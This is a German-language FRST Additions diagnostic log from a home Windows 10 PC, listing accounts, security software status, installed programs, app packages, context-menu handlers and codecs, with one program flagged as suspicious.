FRST Additions Logfile: Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (02-12-2020 21:39:46)
Gestartet von C:\Users\Tom\Desktop
Windows 10 Pro Version 2004 19041.630 (X64) (2020-11-10 10:00:01)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3451750051-380284315-2914928687-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3451750051-380284315-2914928687-503 - Limited - Disabled)
Gast (S-1-5-21-3451750051-380284315-2914928687-501 - Limited - Disabled)
Tom (S-1-5-21-3451750051-380284315-2914928687-1002 - Limited - Enabled) => C:\Users\Tom
Tom_Admin (S-1-5-21-3451750051-380284315-2914928687-1001 - Administrator - Enabled) => C:\Users\Tom_Admin
Vincent (S-1-5-21-3451750051-380284315-2914928687-1003 - Limited - Enabled) => C:\Users\Vincent
WDAGUtilityAccount (S-1-5-21-3451750051-380284315-2914928687-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
4K YouTube to MP3 3.7 (HKLM-x32\...\{C4B2ABD0-F2D6-47C6-B1BE-320A060A5485}) (Version: 3.7.0.2852 - Open Media LLC)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 32.0.0.125 - Adobe)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.85 - Hulubulu Software)
ANT Drivers Installer x64 (HKLM\...\{16BA964D-698D-4663-8FA7-B9613DA7958B}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Ant Renamer (HKLM-x32\...\Ant Renamer 2_is1) (Version: 2.12.0 - Ant Software)
Anthem™ (HKLM-x32\...\{57b4eaa0-f1f5-407e-afbd-2db397381ad8}) (Version: 1.0.64.24016 - Electronic Arts)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Biet-O-Matic v2.14.14 (HKLM-x32\...\Biet-O-Matic v2.14.14) (Version: 2.14.14 - BOM Development Team)
BQ Firmware Flash Tool version 3.0.4 (HKLM-x32\...\{58946287-F553-4D93-AC53-8296836A500A}_is1) (Version: 3.0.4 - Mundo Reader S.L.)
calibre 64bit (HKLM\...\{3BB5C110-3153-47C8-B845-AA5F57C3C0A7}) (Version: 4.14.0 - Kovid Goyal)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.8.7128 - CDBurnerXP)
Command & Conquer™ The Ultimate Collection Additional Content (HKLM-x32\...\{1A882F29-BC18-4AC2-A71E-0FC30FA32568}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™: Generals and Zero Hour (HKLM-x32\...\{609F6FD5-4B22-4D7A-AD30-8C9DD480D5BE}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Das Telefonbuch Gelbe Seiten Map & Route (HKLM-x32\...\DasTelefonbuch Gelbe Seiten Map & Route) (Version: - TVG Telefonbuch- und Verzeichnisverlag GmbH & Co. KG)
DaVinci Resolve (HKLM\...\{5913037B-95C8-4A27-8F37-026BBC7B5AF1}) (Version: 16.1.2026 - Blackmagic Design)
Destiny 2 (HKLM-x32\...\Destiny 2) (Version: - Blizzard Entertainment)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.34 - NVIDIA Corporation) Hidden
Drakonia Black (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - )
DVBViewer Pro (HKLM-x32\...\DVBViewer Pro_is1) (Version: 6.0.4 - CM&V)
Elevated Installer (HKLM-x32\...\{877496C2-70B0-42F1-835A-FAFE2CF0199C}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Epic Games Launcher (HKLM-x32\...\{AF7881ED-41D7-4ECA-8C7C-AE10DFA0E489}) (Version: 1.1.151.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
eSupport UndeletePlus 3.0.8.322 (HKLM-x32\...\eSupport UndeletePlus_is1) (Version: - Copyright © 2015 eSupport.com • All Rights Reserved)
Gameforge Client (HKLM-x32\...\{d3b2a0c1-f0d0-4888-ae0b-1c5e1febdafb}_is1) (Version: 2.1.12.165 - Gameforge)
Garmin Express (HKLM-x32\...\{235f2ee5-7383-44df-a298-01221caa5532}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{E944FA32-8BCF-474F-BFB2-D1EF24555873}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
GIMP 2.10.14 (HKLM\...\GIMP-2_is1) (Version: 2.10.14 - The GIMP Team)
Google Earth Pro (HKLM-x32\...\{59F21DFB-6977-434B-9CB9-67783D6E7B6B}) (Version: 7.3.3.7786 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.22) (Version: 9.22 - Artifex Software Inc.)
Hauppauge WinTV 8 (HKLM-x32\...\Hauppauge WinTV 8) (Version: v8.0.35159 (CD 5.6) - Hauppauge Computer Works)
IrfanView 4.50 (64-bit) (HKLM\...\IrfanView64) (Version: 4.50 - Irfan Skiljan)
Java 10.0.2 (64-bit) (HKLM\...\{EECB2736-D013-5AC5-9917-7656712F6931}) (Version: 10.0.2.0 - Oracle Corporation)
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
Java(TM) SE Development Kit 12.0.2 (64-bit) (HKLM\...\{3FA68A00-9C88-5E69-870A-B40CB89DC2EF}) (Version: 12.0.2.0 - Oracle Corporation)
K-Lite Mega Codec Pack 14.9.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.9.4 - KLCP)
Krita (x64) 4.2.3 (HKLM\...\Krita_x64) (Version: 4.2.3.0 - Krita Foundation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LEGO Digital Designer (HKLM-x32\...\New LEGO Digital Designer) (Version: - LEGO A/S)
Lidl Fotos (HKLM-x32\...\{FDABC3E8-59D0-4B9E-B181-4597DD6B4B74}_is1) (Version: - Lidl DE)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.3.6 - CEWE Stiftung u Co. KGaA)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.52 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft Office FrontPage 2003 (HKLM-x32\...\{90170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Retail - de-de) (Version: 16.0.13328.20356 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\OneDriveSetup.exe) (Version: 19.103.0527.0003 - Microsoft Corporation)
Microsoft SQL Server*2014 Express LocalDB (HKLM\...\{CA191120-4CB1-4E3D-89B8-79FDB9017A2E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Teams) (Version: 1.3.00.24755 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version: - Pavel Cvrcek)
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 83.0.0.7621 - Mozilla)
Mozilla Thunderbird 52.5.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 52.5.0 (x86 de)) (Version: 52.5.0 - Mozilla)
Mozilla Thunderbird 78.5.0 (x86 de) (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Mozilla Thunderbird 78.5.0 (x86 de)) (Version: 78.5.0 - Mozilla)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.11 - F.J. Wechselberger)
News File Grabber 4.6.0.4 (HKLM-x32\...\News File Grabber_is1) (Version: - RSBR-Software)
NosTale de-DE (HKLM-x32\...\{dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9.de-DE}) (Version: - Gameforge)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.9 - Notepad++ Team)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 24.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
OpenAudible 2.3.5 (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\7008-5171-7013-3819) (Version: 2.3.5 - openaudible.org)
Origin (HKLM-x32\...\Origin) (Version: 10.5.89.45622 - Electronic Arts, Inc.)
PDF24 Creator 9.2.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.0 - PDF24.org)
Phase 5 HTML-Editor (HKLM-x32\...\{20B1B020-DEAE-48D1-9960-D4C3185D758B}) (Version: 5.6.2.3 - Systemberatung Schommer)
Plex Media Server (HKLM-x32\...\{1b8e71fc-44b8-4550-9376-72db5f2746ce}) (Version: 1.11.3.4803 - Plex, Inc.)
Plex Media Server (HKLM-x32\...\{617D6B5B-FCAE-43F5-9B09-73798070833E}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Pokémon Trading Card Game Online (HKLM-x32\...\{C239A609-2496-402F-A119-4BF92B43D717}) (Version: 2.49.0 - The Pokémon Company International)
ProgTV 2 (x64) x64 (HKLM\...\ProgTV) (Version: 2.x - Prog)
QuickPar 0.9 (HKLM-x32\...\QuickPar) (Version: 0.9 - Peter B. Clements)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7910 - Realtek Semiconductor Corp.)
RecordPad Audio-Recorder (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Recordpad) (Version: 7.05 - NCH Software)
RV-Print 2.0 (HKLM-x32\...\{38DC365A-06D8-494C-8F29-04B3A6652ACE}) (Version: 2.00.684.0 - Resch-Verlag)
SABnzbd 2.3.7 (HKLM-x32\...\SABnzbd) (Version: 2.3.7 - The SABnzbd Team)
Scratch 2 Offline Editor (HKLM-x32\...\{6E988774-5309-E02E-7EA8-F19CB65C2063}) (Version: 255 - Massachusetts Institute of Technology) Hidden
Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 461 - Massachusetts Institute of Technology)
Settlers 7 (HKLM-x32\...\Uplay Install 8) (Version: - Ubisoft)
Shotcut (HKLM-x32\...\Shotcut) (Version: 20.02.17 - Meltytech, LLC)
SpeedCommander 16 (x64) (HKLM\...\SpeedCommander 16 (x64)) (Version: 16.20.8300 - SWE Sven Ritter)
SpeedCommander 17 (x64) (HKLM\...\SpeedCommander 17 (x64)) (Version: 17.30.8900 - SWE Sven Ritter)
StarMoney (HKLM-x32\...\{54552154-C54F-4F81-99FE-84567C2BCB56}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{5C1209B1-FA1D-40D3-BA13-4ED9F0F31002}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{99D7711E-74BE-4920-8088-CB785D4C406F}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B535DF59-3B5C-40B6-934B-BAF2987CA9A0}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B98B1721-994D-4B47-B097-ADD88E57A298}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{BA8CA518-A9B4-485C-AEE0-22E3F0E0E5F6}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{E771D898-9A06-4EEF-B84D-B2DB75080F3E}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{F8726CFE-2A08-4B2A-9E10-645F38D5A04A}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney 11 (HKLM-x32\...\{99DED8BC-9674-43AA-AE56-8E52C15769B1}) (Version: 11 - Star Finanz GmbH)
StarMoney 12 Basic (HKLM-x32\...\{80A5295E-DD70-4A94-86A3-8F63AE01F0E5}) (Version: 12 - Star Finanz GmbH)
Startfenster-Replace (HKLM-x32\...\Startfenster-Replace.de) (Version: 1.0.3 - Startfenster-Replace) <==== ACHTUNG
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StExBar (HKLM-x32\...\{A5927ACA-AE5E-44E6-97BA-3E512CFF3963}) (Version: 1.10.0 - Stefans Tools)
Stopping Plex (HKLM-x32\...\{E70B9551-B5D4-41BC-AB7C-EE44025F77DC}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Synology Assistant (remove only) (HKLM-x32\...\Synology Assistant) (Version: 6.1-15163 - Synology)
Synology Photo Station Uploader (remove only) (HKLM-x32\...\Photo Station Uploader) (Version: 1.4.3.087 - Synology)
T16 Wired Gaming Mouse (HKLM-x32\...\{444BE55C-4B14-4DB8-9922-6846C1437677}_is1) (Version: 1.0.3 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.2.1 - TeamSpeak Systems GmbH)
TempoPerfect Metronome Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\TempoPerfect) (Version: 4.08 - NCH Software)
Titanfall™ 2 (HKLM-x32\...\{4BD80373-FEE7-45B6-8249-6E8E98717405}) (Version: 1.0.1.3 - Electronic Arts, Inc.)
Tone Generator Tongenerator-Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\ToneGen) (Version: 3.05 - NCH Software)
twengoo (HKLM-x32\...\{2ADA8DBD-2833-4235-A07E-0CD653A992FF}) (Version: 1.0.0.0 - Twengoo)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Updater (HKLM-x32\...\Updater) (Version: 1.0 - Updater)
Uplay (HKLM-x32\...\Uplay) (Version: 73.0 - Ubisoft)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version: - DownloadHelper)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
VSDC Free Video Editor Version 6.4.2.102 (HKLM\...\VSDC Free Video Editor_is1) (Version: 6.4.2.102 - Flash-Integro LLC)
Wahlhelfer2018 (HKLM-x32\...\{AFC040C0-4AB0-11DE-5F90-00A66CB96952}) (Version: Version 1.34 - W.A.F. Institut AG)
WavePad Audio-Editor (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\WavePad) (Version: 8.08 - NCH Software)
Web Companion (HKLM-x32\...\{939d37af-8908-4904-bf96-c2b98f5730ae}) (Version: 4.10.2225.4082 - Lavasoft)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
Windows 7 Games for Windows 10 and 8 (HKLM\...\Win7Games) (Version: 2.0 - hxxp://winaero.com)
Windows-Treiberpaket - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows-Treiberpaket - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
Wondershare Filmora9(Build 9.3.6) (HKLM\...\Wondershare Filmora9_is1) (Version: - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
World in Conflict (HKLM-x32\...\Uplay Install 90) (Version: - Ubisoft)
Packages:
=========
Audible - Hörbuch und Hörspiel App -> C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2 [0000-00-00] (Audible Inc)
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_121.1.193.0_x64__v10z8vjag6ke6 [0000-00-00] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_4.0.11030.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Studios) [MS Ad]
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-09-24] (Notepad++ -> )
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => d:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) [Datei ist nicht signiert]
ContextMenuHandlers1-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-02] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\system32\x264vfw64.dll [3799552 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\system32\lagarith.dll [148992 2011-12-07] () [Datei ist nicht signiert]
